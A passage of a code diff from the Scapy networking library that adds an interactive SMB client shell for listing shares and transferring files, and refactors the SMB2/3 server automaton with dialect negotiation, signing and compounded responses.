ref, buf in zip(self.ReferralEntries, self.ReferralBuffer): + for fld in buf.fields_desc: + off = entryoffset + offsets[fld.name] + if ref.getfieldval(fld.name + "Offset") is None and buf.getfieldval( + fld.name + ): + pkt = pkt[:off] + struct.pack(" timeout: + self.sock.close() + raise TimeoutError("The SMB handshake timed out.") + time.sleep(0.1) + except Exception: + # Something bad happened, end the socket/automaton + self.sock.close() + raise + + # For some usages, we will also need the RPC wrapper + from scapy.layers.msrpce.rpcclient import DCERPC_Client + + self.rpcclient = DCERPC_Client.from_smblink(self.sock, ndr64=False, verb=False) + # We have a valid smb connection ! + print( + "SMB authentication successful using %s%s !" + % ( + repr(self.sock.atmt.sspcontext), + " as GUEST" if self.sock.atmt.IsGuest else "", + ) + ) + # Now define some variables for our CLI + self.pwd = pathlib.PureWindowsPath("/") + self.localpwd = pathlib.Path(".").resolve() + self.current_tree = None + self.ls_cache = {} # cache the listing of the current directory + # Start CLI + if cli: + self.loop(debug=debug) + + def ps1(self): + return r"smb: \%s> " % self.normalize_path(self.pwd) + + def close(self): + print("Connection closed") + self.smbsock.close() + + def _require_share(self, silent=False): + if self.current_tree is None: + if not silent: + print("No share selected ! Try 'shares' then 'use'.") + return True + + def collapse_path(self, path): + # the amount of pathlib.wtf you need to do to resolve .. on all platforms + # is ridiculous + return pathlib.PureWindowsPath(os.path.normpath(path.as_posix())) + + def normalize_path(self, path): + """ + Normalize path for CIFS usage + """ + return str(self.collapse_path(path)).lstrip("\\") + + @CLIUtil.addcommand() + def shares(self): + """ + List the shares available + """ + # One of the 'hardest' considering it's an RPC + self.rpcclient.open_smbpipe("srvsvc") + self.rpcclient.bind(find_dcerpc_interface("srvsvc")) + req = NetrShareEnum_Request( + InfoStruct=LPSHARE_ENUM_STRUCT( + Level=1, + ShareInfo=NDRUnion( + tag=1, + value=SHARE_INFO_1_CONTAINER(Buffer=None), + ), + ), + PreferedMaximumLength=0xFFFFFFFF, + ) + resp = self.rpcclient.sr1_req(req, timeout=self.timeout) + self.rpcclient.close_smbpipe() + if not isinstance(resp, NetrShareEnum_Response): + raise ValueError("NetrShareEnum_Request failed !") + results = [] + for share in resp.valueof("InfoStruct.ShareInfo.Buffer"): + shi1_type = share.valueof("shi1_type") & 0x0FFFFFFF + results.append( + ( + share.valueof("shi1_netname").decode(), + SRVSVC_SHARE_TYPES.get(shi1_type, shi1_type), + share.valueof("shi1_remark").decode(), + ) + ) + return results + + @CLIUtil.addoutput(shares) + def shares_output(self, results): + """ + Print the output of 'shares' + """ + print(pretty_list(results, [("ShareName", "ShareType", "Comment")])) + + @CLIUtil.addcommand() + def use(self, share): + """ + Open a share + """ + self.current_tree = self.smbsock.tree_connect(share) + self.pwd = pathlib.PureWindowsPath("/") + self.ls_cache.clear() + + def _parsepath(self, arg, remote=True): + """ + Parse a path. Returns the parent folder and file name + """ + # Find parent directory if it exists + elt = (pathlib.PureWindowsPath if remote else pathlib.Path)(arg) + eltpar = (pathlib.PureWindowsPath if remote else pathlib.Path)(".") + eltname = elt.name + if arg.endswith("/") or arg.endswith("\\"): + eltpar = elt + eltname = "" + elif elt.parent and elt.parent.name: + eltpar = elt.parent + return eltpar, eltname + + def _fs_complete(self, arg, cond=None): + """ + Return a listing of the remote files for completion purposes + """ + if cond is None: + cond = lambda _: True + eltpar, eltname = self._parsepath(arg) + # ls in that directory + try: + files = self.ls(parent=eltpar) + except ValueError: + return [] + return [ + str(eltpar / x[0]) + for x in files + if ( + x[0].lower().startswith(eltname.lower()) + and x[0] not in [".", ".."] + and cond(x[1]) + ) + ] + + def _dir_complete(self, arg): + """ + Return a directories of remote files for completion purposes + """ + results = self._fs_complete( + arg, + cond=lambda x: x.FILE_ATTRIBUTE_DIRECTORY, + ) + if len(results) == 1 and results[0].startswith(arg): + # skip through folders + return [results[0] + "\\"] + return results + + @CLIUtil.addcommand(spaces=True) + def ls(self, parent=None): + """ + List the files in the remote directory + """ + if self._require_share(): + return + # Get pwd of the ls + pwd = self.pwd + if parent is not None: + pwd /= parent + pwd = self.normalize_path(pwd) + # Poll the cache + if self.ls_cache and pwd in self.ls_cache: + return self.ls_cache[pwd] + self.smbsock.set_TID(self.current_tree) + # Open folder + fileId = self.smbsock.create_request( + pwd, + type="folder", + extra_create_options=self.extra_create_options, + ) + # Query the folder + files = self.smbsock.query_directory(fileId) + # Close the folder + self.smbsock.close_request(fileId) + self.ls_cache[pwd] = files # Store cache + return files + + @CLIUtil.addoutput(ls) + def ls_output(self, results): + """ + Print the output of 'ls' + """ + results = [ + ( + x[0], + "+".join(y.lstrip("FILE_ATTRIBUTE_") for y in str(x[1]).split("+")), + human_size(x[2]), + x[3], + ) + for x in results + ] + print( + pretty_list( + results, [("FileName", "FileAttributes", "EndOfFile", "LastWriteTime")] + ) + ) + + @CLIUtil.addcomplete(ls) + def ls_complete(self, folder): + """ + Auto-complete ls + """ + if self._require_share(silent=True): + return [] + return self._dir_complete(folder) + + @CLIUtil.addcommand(spaces=True) + def cd(self, folder): + """ + Change the remote current directory + """ + if self._require_share(): + return + if not folder: + # show mode + return str(self.pwd) + self.pwd /= folder + self.pwd = self.collapse_path(self.pwd) + self.ls_cache.clear() + + @CLIUtil.addcomplete(cd) + def cd_complete(self, folder): + """ + Auto-complete cd + """ + if self._require_share(silent=True): + return [] + return self._dir_complete(folder) + + def _lfs_complete(self, arg, cond): + """ + Return a listing of local files for completion purposes + """ + eltpar, eltname = self._parsepath(arg, remote=False) + eltpar = self.localpwd / eltpar + return [ + self.normalize_path(eltpar / x) + for x in eltpar.glob("*") + if (x.name.lower().startswith(eltname.lower()) and cond(x)) + ] + + @CLIUtil.addoutput(cd) + def cd_output(self, result): + """ + Print the output of 'cd' + """ + if result: + print(result) + + @CLIUtil.addcommand() + def lls(self): + """ + List the files in the local directory + """ + return list(self.localpwd.glob("*")) + + @CLIUtil.addoutput(lls) + def lls_output(self, results): + """ + Print the output of 'lls' + """ + results = [ + ( + x.name, + human_size(stat.st_size), + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(stat.st_mtime)), + ) + for x, stat in ((x, x.stat()) for x in results) + ] + print( + pretty_list(results, [("FileName", "File Size", "Last Modification Time")]) + ) + + @CLIUtil.addcommand(spaces=True) + def lcd(self, folder): + """ + Change the local current directory + """ + if not folder: + # show mode + return str(self.localpwd) + self.localpwd /= folder + self.localpwd = self.localpwd.resolve() + + @CLIUtil.addcomplete(lcd) + def lcd_complete(self, folder): + """ + Auto-complete lcd + """ + return self._lfs_complete(folder, lambda x: x.is_dir()) + + @CLIUtil.addoutput(lcd) + def lcd_output(self, result): + """ + Print the output of 'lcd' + """ + if result: + print(result) + + def _get_file(self, file, fd): + """ + Gets the file bytes from a remote host + """ + # Get pwd of the ls + fpath = self.pwd / file + self.smbsock.set_TID(self.current_tree) + # Open file + fileId = self.smbsock.create_request( + self.normalize_path(fpath), + type="file", + extra_create_options=self.extra_create_options, + ) + # Get the file size + info = FileAllInformation( + self.smbsock.query_info( + FileId=fileId, + InfoType="SMB2_0_INFO_FILE", + FileInfoClass="FileAllInformation", + ) + ) + length = info.StandardInformation.EndOfFile + offset = 0 + # Read the file + while length: + lengthRead = min(self.MaxReadSize, length) + fd.write( + self.smbsock.read_request(fileId, Length=lengthRead, Offset=offset) + ) + offset += lengthRead + length -= lengthRead + # Close the file + self.smbsock.close_request(fileId) + return offset + + def _send_file(self, fname, fd): + """ + Send the file bytes to a remote host + """ + # Get destination file + fpath = self.pwd / fname + self.smbsock.set_TID(self.current_tree) + # Open file + fileId = self.smbsock.create_request( + self.normalize_path(fpath), + type="file", + mode="w", + extra_create_options=self.extra_create_options, + ) + # Send the file + offset = 0 + while True: + data = fd.read(self.MaxWriteSize) + if not data: + # end of file + break + offset += self.smbsock.write_request( + Data=data, + FileId=fileId, + Offset=offset, + ) + # Close the file + self.smbsock.close_request(fileId) + return offset + + @CLIUtil.addcommand(spaces=True) + def get(self, file): + """ + Retrieve a file + """ + if self._require_share(): + return + fname = pathlib.PureWindowsPath(file).name + # Write the buffer to current path + local_pwd = self.localpwd / fname + with local_pwd.open("wb") as fd: + size = self._get_file(file, fd) + return fname, size + + @CLIUtil.addoutput(get) + def get_output(self, info): + """ + Print the output of 'get' + """ + print("Retrieved file %s of size %s" % (info[0], human_size(info[1]))) + + @CLIUtil.addcomplete(get) + def get_complete(self, file): + """ + Auto-complete get + """ + if self._require_share(silent=True): + return [] + return self._fs_complete(file) + + @CLIUtil.addcommand(spaces=True) + def cat(self, file): + """ + Print a file + """ + if self._require_share(): + return + # Write the buffer to buffer + buf = io.BytesIO() + self._get_file(file, buf) + return buf.getvalue() + + @CLIUtil.addoutput(cat) + def cat_output(self, result): + """ + Print the output of 'cat' + """ + print(result.decode(errors="backslashreplace")) + + @CLIUtil.addcomplete(cat) + def cat_complete(self, file): + """ + Auto-complete cat + """ + if self._require_share(silent=True): + return [] + return self._fs_complete(file) + + @CLIUtil.addcommand(spaces=True) + def put(self, file): + """ + Upload a file + """ + if self._require_share(): + return + local_file = self.localpwd / file + if local_file.is_dir(): + # Directory + raise ValueError("put on dir not impl") + else: + fname = pathlib.Path(file).name + with local_file.open("rb") as fd: + size = self._send_file(fname, fd) + self.ls_cache.clear() + return fname, size + + @CLIUtil.addcommand(spaces=True) + def rm(self, file): + """ + Delete a file + """ + if self._require_share(): + return + # Get pwd of the ls + fpath = self.pwd / file + self.smbsock.set_TID(self.current_tree) + # Open file + fileId = self.smbsock.create_request( + self.normalize_path(fpath), + type="file", + mode="d", + extra_create_options=self.extra_create_options, + ) + # Close the file + self.smbsock.close_request(fileId) + self.ls_cache.clear() + return fpath.name + + @CLIUtil.addcomplete(rm) + def rm_complete(self, file): + """ + Auto-complete rm + """ + if self._require_share(silent=True): + return [] + return self._fs_complete(file) diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index aaa071d669a..4c665de3af8 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -4,107 +4,432 @@ # Copyright (C) Gabriel Potter """ -SMB 1 / 2 Server Automaton +SMB 2 Server Automaton + +This provides a [MS-SMB2] server that can: +- serve files +- host a DCE/RPC server + +This is a Scapy Automaton that is supposedly easily extendable. """ +import functools +import hashlib +import os +import pathlib +import socket +import struct import time +from scapy.arch import get_if_addr from scapy.automaton import ATMT, Automaton -from scapy.layers.ntlm import ( - NTLM_CHALLENGE, - NTLM_Server, -) +from scapy.config import conf, crypto_validator +from scapy.error import log_runtime, log_interactive from scapy.volatile import RandUUID -from scapy.layers.netbios import NBTSession +from scapy.layers.dcerpc import ( + DCERPC_Transport, + NDRUnion, +) from scapy.layers.gssapi import ( - GSSAPI_BLOB, - SPNEGO_MechListMIC, - SPNEGO_MechType, - SPNEGO_Token, - SPNEGO_negToken, - SPNEGO_negTokenInit, - SPNEGO_negTokenResp, + GSS_S_COMPLETE, + GSS_S_CONTINUE_NEEDED, + GSS_S_CREDENTIALS_EXPIRED, +) +from scapy.layers.msrpce.rpcserver import DCERPC_Server +from scapy.layers.ntlm import ( + NTLMSSP, ) from scapy.layers.smb import ( - SMB_Header, SMBNegotiate_Request, - SMBNegotiate_Response_Security, SMBNegotiate_Response_Extended_Security, + SMBNegotiate_Response_Security, SMBSession_Null, SMBSession_Setup_AndX_Request, SMBSession_Setup_AndX_Request_Extended_Security, SMBSession_Setup_AndX_Response, SMBSession_Setup_AndX_Response_Extended_Security, SMBTree_Connect_AndX, + SMB_Header, ) from scapy.layers.smb2 import ( + DirectTCP, + DFS_REFERRAL_ENTRY1, + DFS_REFERRAL_V3, + FILE_FULL_DIR_INFORMATION, + FILE_ID_BOTH_DIR_INFORMATION, + FILE_BOTH_DIR_INFORMATION, + FILE_NAME_INFORMATION, + FileAllInformation, + FileAlternateNameInformation, + FileBasicInformation, + FileEaInformation, + FileFsAttributeInformation, + FileFsSizeInformation, + FileFsVolumeInformation, + FileIdBothDirectoryInformation, + FileInternalInformation, + FileNetworkOpenInformation, + FileStandardInformation, + FileStreamInformation, + NETWORK_INTERFACE_INFO, + SECURITY_DESCRIPTOR, + SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2, + SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE, + SMB2_CREATE_QUERY_ON_DISK_ID, + SMB2_Cancel_Request, + SMB2_Change_Notify_Request, + SMB2_Change_Notify_Response, + SMB2_Close_Request, + SMB2_Close_Response, + SMB2_Create_Context, + SMB2_Create_Request, + SMB2_Create_Response, + SMB2_Echo_Request, + SMB2_Echo_Response, + SMB2_Encryption_Capabilities, + SMB2_Error_Response, + SMB2_FILEID, SMB2_Header, + SMB2_IOCTL_Network_Interface_Info, + SMB2_IOCTL_RESP_GET_DFS_Referral, + SMB2_IOCTL_Request, SMB2_IOCTL_Response, SMB2_IOCTL_Validate_Negotiate_Info_Response, + SMB2_Negotiate_Context, SMB2_Negotiate_Protocol_Request, SMB2_Negotiate_Protocol_Response, + SMB2_Preauth_Integrity_Capabilities, + SMB2_Query_Directory_Request, + SMB2_Query_Directory_Response, + SMB2_Query_Info_Request, + SMB2_Query_Info_Response, + SMB2_Read_Request, + SMB2_Read_Response, + SMB2_Session_Logoff_Request, + SMB2_Session_Logoff_Response, SMB2_Session_Setup_Request, SMB2_Session_Setup_Response, - SMB2_IOCTL_Request, - SMB2_Error_Response, + SMB2_Signing_Capabilities, + SMB2_Tree_Connect_Request, + SMB2_Tree_Connect_Response, + SMB2_Tree_Disconnect_Request, + SMB2_Tree_Disconnect_Response, + SMB2_Write_Request, + SMB2_Write_Response, + SMB2computePreauthIntegrityHashValue, + SMBStreamSocket, + SOCKADDR_STORAGE, + SRVSVC_SHARE_TYPES, ) +from scapy.layers.spnego import SPNEGOSSP +if conf.crypto_valid: + from scapy.libs.rfc3961 import SP800108_KDFCTR -class NTLM_SMB_Server(NTLM_Server, Automaton): - port = 445 - cls = NBTSession +# Import DCE/RPC +from scapy.layers.msrpce.raw.ms_srvs import ( + LPSERVER_INFO_101, + LPSHARE_ENUM_STRUCT, + LPSHARE_INFO_1, + NetrServerGetInfo_Request, + NetrServerGetInfo_Response, + NetrShareEnum_Request, + NetrShareEnum_Response, + NetrShareGetInfo_Request, + NetrShareGetInfo_Response, + SHARE_INFO_1_CONTAINER, +) +from scapy.layers.msrpce.raw.ms_wkst import ( + LPWKSTA_INFO_100, + NetrWkstaGetInfo_Request, + NetrWkstaGetInfo_Response, +) - def __init__(self, *args, **kwargs): - self.CLIENT_PROVIDES_NEGOEX = kwargs.pop("CLIENT_PROVIDES_NEGOEX", False) - self.ECHO = kwargs.pop("ECHO", False) + +class SMBShare: + """ + A class used to define a share, used by SMB_Server + + :param name: the share name + :param path: the path the the folder hosted by the share + :param type: (optional) share type per [MS-SRVS] sect 2.2.2.4 + :param remark: (optional) a description of the share + """ + + def __init__(self, name, path=".", type=None, remark=""): + # Set the default type + if type is None: + type = 0 # DISKTREE + if name.endswith("$"): + type &= 0x80000000 # SPECIAL + # Lower case the name for resolution + self._name = name.lower() + # Resolve path + self.path = pathlib.Path(path).resolve() + # props + self.name = name + self.type = type + self.remark = remark + + def __repr__(self): + type = SRVSVC_SHARE_TYPES[self.type & 0x0FFFFFFF] + if self.type & 0x80000000: + type = "SPECIAL+" + type + if self.type & 0x40000000: + type = "TEMPORARY+" + type + return "" % ( + self.name, + type, + self.remark and (" '%s'" % self.remark) or "", + str(self.path), + ) + + +# The SMB Automaton + + +class SMB_Server(Automaton): + """ + SMB server automaton + + :param shares: the shares to serve. By default, share nothing. + Note that IPC$ is appended. + :param ssp: the SSP to use + + All other options (in caps) are optional, and SMB specific: + + :param ANONYMOUS_LOGIN: mark the clients as anonymous + :param GUEST_LOGIN: mark the clients as guest + :param REQUIRE_SIGNATURE: set 'Require Signature' + :param MAX_DIALECT: maximum SMB dialect. Defaults to 0x0311 (3.1.1) + :param TREE_SHARE_FLAGS: flags to announce on Tree_Connect_Response + :param TREE_CAPABILITIES: capabilities to announce on Tree_Connect_Response + :param TREE_MAXIMAL_ACCESS: maximal access to announce on Tree_Connect_Response + :param FILE_MAXIMAL_ACCESS: maximal access to announce in MxAc Create Context + """ + + pkt_cls = DirectTCP + socketcls = SMBStreamSocket + + def __init__(self, shares=[], ssp=None, verb=True, *args, **kwargs): + self.verb = verb + if "sock" not in kwargs: + raise ValueError( + "SMB_Server cannot be started directly ! Use SMB_Server.spawn" + ) + # Various SMB server arguments self.ANONYMOUS_LOGIN = kwargs.pop("ANONYMOUS_LOGIN", False) - self.GUEST_LOGIN = kwargs.pop("GUEST_LOGIN", False) - self.PASS_NEGOEX = kwargs.pop("PASS_NEGOEX", False) + self.GUEST_LOGIN = kwargs.pop("GUEST_LOGIN", None) self.EXTENDED_SECURITY = kwargs.pop("EXTENDED_SECURITY", True) - self.ALLOW_SMB2 = kwargs.pop("ALLOW_SMB2", True) + self.USE_SMB1 = kwargs.pop("USE_SMB1", False) self.REQUIRE_SIGNATURE = kwargs.pop("REQUIRE_SIGNATURE", False) - self.REAL_HOSTNAME = kwargs.pop( - "REAL_HOSTNAME", None - ) # Compulsory for SMB1 !!! - assert self.ALLOW_SMB2 or self.REAL_HOSTNAME, "SMB1 requires REAL_HOSTNAME !" - # Session information + self.MAX_DIALECT = kwargs.pop("MAX_DIALECT", 0x0311) + self.TREE_SHARE_FLAGS = kwargs.pop( + "TREE_SHARE_FLAGS", "FORCE_LEVELII_OPLOCK+RESTRICT_EXCLUSIVE_OPENS" + ) + self.TREE_CAPABILITIES = kwargs.pop("TREE_CAPABILITIES", 0) + self.TREE_MAXIMAL_ACCESS = kwargs.pop( + "TREE_MAXIMAL_ACCESS", + "+".join( + [ + "FILE_READ_DATA", + "FILE_WRITE_DATA", + "FILE_APPEND_DATA", + "FILE_READ_EA", + "FILE_WRITE_EA", + "FILE_EXECUTE", + "FILE_DELETE_CHILD", + "FILE_READ_ATTRIBUTES", + "FILE_WRITE_ATTRIBUTES", + "DELETE", + "READ_CONTROL", + "WRITE_DAC", + "WRITE_OWNER", + "SYNCHRONIZE", + ] + ), + ) + self.FILE_MAXIMAL_ACCESS = kwargs.pop( + # Read-only + "FILE_MAXIMAL_ACCESS", + "+".join( + [ + "FILE_READ_DATA", + "FILE_READ_EA", + "FILE_EXECUTE", + "FILE_READ_ATTRIBUTES", + "READ_CONTROL", + "SYNCHRONIZE", + ] + ), + ) + self.LOCAL_IPS = kwargs.pop( + "LOCAL_IPS", [get_if_addr(kwargs.get("iface", conf.iface) or conf.iface)] + ) + self.DOMAIN_REFERRALS = kwargs.pop("DOMAIN_REFERRALS", []) + if self.USE_SMB1: + log_runtime.warning("Serving SMB1 is not supported :/") + # We don't want to update the parent shares argument + self.shares = shares.copy() + # Append the IPC$ share + self.shares.append( + SMBShare( + name="IPC$", + type=0x80000003, # SPECIAL+IPC + remark="Remote IPC", + ) + ) + # Initialize the DCE/RPC server for SMB + self.rpc_server = SMB_DCERPC_Server( + DCERPC_Transport.NCACN_NP, + shares=self.shares, + verb=self.verb, + ) + # Extend it if another DCE/RPC server is provided + if "DCERPC_SERVER_CLS" in kwargs: + self.rpc_server.extend(kwargs.pop("DCERPC_SERVER_CLS")) + # Internal Session information self.SMB2 = False self.Dialect = None - self.GUID = False - super(NTLM_SMB_Server, self).__init__(*args, **kwargs) + self.NegotiateCapabilities = None + self.GUID = RandUUID()._fix() + self.SMBSessionKey = None + self.PreauthIntegrityHashId = "SHA-512" + self.CipherId = "AES-128-CCM" + self.SigningAlgorithmId = "AES-CMAC" + self.Salt = None + self.ConnectionPreauthIntegrityHashValue = None + self.SessionPreauthIntegrityHashValue = None + # Compounds are handled on receiving by the StreamSocket, + # and on aggregated in a CompoundQueue to be sent in one go + self.NextCompound = False + self.CompoundQueue = [] + self.CompoundedHandle = None + # SSP provider + self.SecurityMode = kwargs.pop( + "SECURITY_MODE", + 3 if self.REQUIRE_SIGNATURE else bool(ssp), + ) + if ssp is None: + # No SSP => fallback on NTLM with guest + ssp = SPNEGOSSP( + [ + NTLMSSP( + USE_MIC=False, + DO_NOT_CHECK_LOGIN=True, + ), + ] + ) + if self.GUEST_LOGIN is None: + self.GUEST_LOGIN = True + self.ssp = ssp + self.sspcontext = None + # Initialize + Automaton.__init__(self, *args, **kwargs) + + def vprint(self, s=""): + """ + Verbose print (if enabled) + """ + if self.verb: + if conf.interactive: + log_interactive.info("> %s", s) + else: + print("> %s" % s) def send(self, pkt): - if self.Dialect and self.SigningSessionKey: - if isinstance(pkt.payload, SMB2_Header): + """ + Handles: + - handle compounded requests (if any): [MS-SMB2] 3.3.5.2.7 + - handles signing (if required) + """ + # Note: impacket and wireshark get crazy on compounded+signature, but + # windows+samba tells we're right :D + if SMB2_Header in pkt: + if self.CompoundQueue: + # this is a subsequent compound: only keep the SMB2 + pkt = pkt[SMB2_Header] + if self.NextCompound: + # [MS-SMB2] 3.2.4.1.4 + # "Compounded requests MUST be aligned on 8-byte boundaries; the + # last request of the compounded requests does not need to be padded to + # an 8-byte boundary." + # [MS-SMB2] 3.1.4.1 + # "If the message is part of a compounded chain, any + # padding at the end of the message MUST be used in the hash + # computation." + length = len(pkt[SMB2_Header]) + padlen = (-length) % 8 + if padlen: + pkt.add_payload(b"\x00" * padlen) + pkt[SMB2_Header].NextCommand = length + padlen + if self.Dialect and self.SMBSessionKey and self.SecurityMode != 0: # Sign SMB2 ! smb = pkt[SMB2_Header] smb.Flags += "SMB2_FLAGS_SIGNED" - smb.sign(self.Dialect, self.SigningSessionKey) - return super(NTLM_SMB_Server, self).send(pkt) + smb.sign( + self.Dialect, + self.SMBSessionKey, + # SMB 3.1.1 parameters: + SigningAlgorithmId=self.SigningAlgorithmId, + IsClient=False, + ) + if self.NextCompound: + # There IS a next compound. Store in queue + self.CompoundQueue.append(pkt) + return + else: + # If there are any compounded responses in store, sum them + if self.CompoundQueue: + pkt = functools.reduce(lambda x, y: x / y, self.CompoundQueue) / pkt + self.CompoundQueue.clear() + return super(SMB_Server, self).send(pkt) + + @crypto_validator + def computeSMBSessionKey(self): + if not self.sspcontext.SessionKey: + # no signing key, no session key + return + # [MS-SMB2] sect 3.3.5.5.3 + if self.Dialect >= 0x0300: + if self.Dialect == 0x0311: + label = b"SMBSigningKey\x00" + preauth_hash = self.SessionPreauthIntegrityHashValue + else: + label = b"SMB2AESCMAC\x00" + preauth_hash = b"SmbSign\x00" + # [MS-SMB2] sect 3.1.4.2 + if "256" in self.CipherId: + L = 256 + elif "128" in self.CipherId: + L = 128 + else: + raise ValueError + self.SMBSessionKey = SP800108_KDFCTR( + self.sspcontext.SessionKey[:16], + label, # label + preauth_hash, # context + L, + ) + elif self.Dialect <= 0x0210: + self.SMBSessionKey = self.sspcontext.SessionKey[:16] + else: + raise ValueError("Hmmm ? >:(") @ATMT.state(initial=1) def BEGIN(self): self.authenticated = False - assert ( - not self.ECHO or self.cli_atmt - ), "Cannot use ECHO without binding to a client !" @ATMT.receive_condition(BEGIN) def received_negotiate(self, pkt): if SMBNegotiate_Request in pkt: - if self.cli_atmt: - self.start_client() raise self.NEGOTIATED().action_parameters(pkt) @ATMT.receive_condition(BEGIN) def received_negotiate_smb2_begin(self, pkt): if SMB2_Negotiate_Protocol_Request in pkt: self.SMB2 = True - if self.cli_atmt: - self.start_client( - CONTINUE_SMB2=True, SMB2_INIT_PARAMS={"ClientGUID": pkt.ClientGUID} - ) raise self.NEGOTIATED().action_parameters(pkt) @ATMT.action(received_negotiate_smb2_begin) @@ -113,27 +438,26 @@ def on_negotiate_smb2_begin(self, pkt): @ATMT.action(received_negotiate) def on_negotiate(self, pkt): - if self.CLIENT_PROVIDES_NEGOEX: - negoex_token, _, _, _ = self.get_token(negoex=True) - else: - negoex_token = None - if not self.SMB2 and not self.get("GUID", 0): - self.EXTENDED_SECURITY = False + self.sspcontext, spnego_token = self.ssp.NegTokenInit2() # Build negotiate response DialectIndex = None DialectRevision = None if SMB2_Negotiate_Protocol_Request in pkt: # SMB2 DialectRevisions = pkt[SMB2_Negotiate_Protocol_Request].Dialects - DialectRevisions.sort() - DialectRevision = DialectRevisions[0] - if DialectRevision >= 0x300: # SMB3 - raise ValueError("SMB client requires SMB3 which is unimplemented.") + DialectRevisions = [x for x in DialectRevisions if x <= self.MAX_DIALECT] + DialectRevisions.sort(reverse=True) + if DialectRevisions: + DialectRevision = DialectRevisions[0] else: + # SMB1 DialectIndexes = [ x.DialectString for x in pkt[SMBNegotiate_Request].Dialects ] - if self.ALLOW_SMB2: + if self.USE_SMB1: + # Enforce SMB1 + DialectIndex = DialectIndexes.index(b"NT LM 0.12") + else: # Find a value matching SMB2, fallback to SMB1 for key, rev in [(b"SMB 2.???", 0x02FF), (b"SMB 2.002", 0x0202)]: try: @@ -145,9 +469,6 @@ def on_negotiate(self, pkt): pass else: DialectIndex = DialectIndexes.index(b"NT LM 0.12") - else: - # Enforce SMB1 - DialectIndex = DialectIndexes.index(b"NT LM 0.12") if DialectRevision and DialectRevision & 0xFF != 0xFF: # Version isn't SMB X.??? self.Dialect = DialectRevision @@ -155,18 +476,16 @@ def on_negotiate(self, pkt): if self.SMB2: # SMB2 cls = SMB2_Negotiate_Protocol_Response - self.smb_header = NBTSession() / SMB2_Header( - CreditsRequested=1, + self.smb_header = DirectTCP() / SMB2_Header( + Flags="SMB2_FLAGS_SERVER_TO_REDIR", + CreditRequest=1, CreditCharge=1, ) if SMB2_Negotiate_Protocol_Request in pkt: - self.smb_header.MID = pkt.MID - self.smb_header.TID = pkt.TID - self.smb_header.AsyncId = pkt.AsyncId - self.smb_header.SessionId = pkt.SessionId + self.update_smbheader(pkt) else: # SMB1 - self.smb_header = NBTSession() / SMB_Header( + self.smb_header = DirectTCP() / SMB_Header( Flags="REPLY+CASE_INSENSITIVE+CANONICALIZED_PATHS", Flags2=( "LONG_NAMES+EAS+NT_STATUS+SMB_SECURITY_SIGNATURE+" @@ -181,19 +500,81 @@ def on_negotiate(self, pkt): cls = SMBNegotiate_Response_Extended_Security else: cls = SMBNegotiate_Response_Security - if self.SMB2: - # SMB2 + if DialectRevision is None and DialectIndex is None: + # No common dialect found. + if self.SMB2: + resp = self.smb_header.copy() / SMB2_Error_Response() + resp.Command = "SMB2_NEGOTIATE" + else: + resp = self.smb_header.copy() / SMBSession_Null() + resp.Command = "SMB_COM_NEGOTIATE" + resp.Status = "STATUS_NOT_SUPPORTED" + self.send(resp) + return + if self.SMB2: # SMB2 + # Capabilities: [MS-SMB2] 3.3.5.4 + self.NegotiateCapabilities = "+".join( + [ + "DFS", + "LEASING", + "LARGE_MTU", + ] + ) + if DialectRevision >= 0x0300: + # "if Connection.Dialect belongs to the SMB 3.x dialect family, + # the server supports..." + self.NegotiateCapabilities += "+" + "+".join( + [ + "MULTI_CHANNEL", + "PERSISTENT_HANDLES", + "DIRECTORY_LEASING", + ] + ) + if DialectRevision in [0x0300, 0x0302]: + # "if Connection.Dialect is "3.0" or "3.0.2""... + # Note: 3.1.1 uses the ENCRYPT_DATA flag in Tree Connect Response + self.NegotiateCapabilities += "+ENCRYPTION" + # Build response resp = self.smb_header.copy() / cls( DialectRevision=DialectRevision, - SecurityMode=3 - if self.REQUIRE_SIGNATURE - else self.get("SecurityMode", bool(self.IDENTITIES)), - ServerTime=self.get("ServerTime", time.time() + 11644473600), + SecurityMode=self.SecurityMode, + ServerTime=(time.time() + 11644473600) * 1e7, ServerStartTime=0, MaxTransactionSize=65536, MaxReadSize=65536, MaxWriteSize=65536, + Capabilities=self.NegotiateCapabilities, ) + # SMB >= 3.0.0 + if DialectRevision >= 0x0300: + # [MS-SMB2] sect 3.3.5.3.1 note 253 + resp.MaxTransactionSize = 0x800000 + resp.MaxReadSize = 0x800000 + resp.MaxWriteSize = 0x800000 + # SMB 3.1.1 + if DialectRevision >= 0x0311: + self.Salt = os.urandom(32) + resp.NegotiateContexts = [ + # Preauth capabilities + SMB2_Negotiate_Context() + / SMB2_Preauth_Integrity_Capabilities( + # SHA-512 by default + HashAlgorithms=[self.PreauthIntegrityHashId], + Salt=self.Salt, + ), + # Encryption capabilities + SMB2_Negotiate_Context() + / SMB2_Encryption_Capabilities( + # AES-128-CCM by default + Ciphers=[self.CipherId], + ), + # Signing capabilities + SMB2_Negotiate_Context() + / SMB2_Signing_Capabilities( + # AES-128-CCM by default + SigningAlgorithms=[self.SigningAlgorithmId], + ), + ] else: # SMB1 resp = self.smb_header.copy() / cls( @@ -203,55 +584,45 @@ def on_negotiate(self, pkt): "LEVEL_II_OPLOCKS+LOCK_AND_READ+NT_FIND+" "LWIO+INFOLEVEL_PASSTHRU+LARGE_READX+LARGE_WRITEX" ), - SecurityMode=( - 3 - if self.REQUIRE_SIGNATURE - else self.get("SecurityMode", bool(self.IDENTITIES)) - ), - ServerTime=self.get("ServerTime"), - ServerTimeZone=self.get("ServerTimeZone"), + SecurityMode=self.SecurityMode, + ServerTime=(time.time() + 11644473600) * 1e7, + ServerTimeZone=0x3C, ) if self.EXTENDED_SECURITY: resp.ServerCapabilities += "EXTENDED_SECURITY" if self.EXTENDED_SECURITY or self.SMB2: # Extended SMB1 / SMB2 + resp.GUID = self.GUID # Add security blob - resp.SecurityBlob = GSSAPI_BLOB( - innerContextToken=SPNEGO_negToken( - token=SPNEGO_negTokenInit( - mechTypes=[ - # NEGOEX - Optional. See below - # NTLMSSP - SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.10") - ], - ) - ) - ) - self.GUID = resp.GUID = self.get("GUID", RandUUID()._fix()) - if self.PASS_NEGOEX: # NEGOEX handling - # NOTE: NegoEX has an effect on how the SecurityContext is - # initialized, as detailed in [MS-AUTHSOD] sect 3.3.2 - # But the format that the Exchange token uses appears not to - # be documented :/ - 